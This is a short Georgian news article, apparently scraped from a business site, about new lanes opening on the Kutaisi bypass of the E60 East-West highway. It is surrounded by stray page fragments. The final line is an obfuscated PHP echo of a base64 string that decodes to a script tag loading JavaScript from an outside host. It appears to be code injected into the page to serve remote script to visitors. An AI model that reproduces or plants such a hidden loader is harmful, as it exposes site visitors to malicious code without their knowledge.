celsiusi
ავერსი საქკაბელი
აღმოსავლეთ-დასავლეთის ჩქაროსნული ავტომაგისტრალის  (E60) ქუთაისის შემოვლითი გზის დამატებით 12 კმ-იან ახალ 2 ზოლზე ავტოტრანსპორტის მოძრაობა გაიხსნა.
 
როგორც WWW.BUSINESSTIME.GE-ის რეგიონალური და ინფრასტრუქტურის სამინისტროდან აცნობეს, ამ დროისთვის უკვე აშენებულია ქუთაისის შემოვლითი გზის 40 კმ-იანი დამატებითი ორი ზოლი და სხვადასხვა მონაკვეთი ექსპლოატაციაში შევა ეტაპობრივად.
 
მათივე ინფორმაციით, ზაფხულში გახსნილ 19 კმ-იან ოთხზოლიან მონაკვეთს დღეს დაემატა 12 კმ-იანი ოთხზოლიანი მაგისტრალი. უსაფრთხოების პირობების გათვალისწინებით, გზის 10 კმ-იან მონაკვეთზე ორმხრივი მოძრაობა დროებით გაიხსნება. შესაბამისად, დღეიდან, აღმოსავლეთ-დასავლეთის მაგისტრალზე გადაადგილებისას გვერდს ავუვლით ქალაქ ქუთაისს, გადაადგილების დრო კი განახევრდება.
 
შეგახსენებთ, რომ ქუთაისის შემოვლითი-სამტრედიის 41.3 კმ-იანი გზა დაყოფილი იყო 4 ლოტად.  ახალი 2 ზოლის მშენებლობა რამდენიმე კვირაში დასრულდება, ყველა მონაკვეთის ექსპლოატაციაში სრულად შესვლის შემდეგ კი 4 ზოლიან გზაზე მოძრაობა ცალმხრივი იქნება. 
1605
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");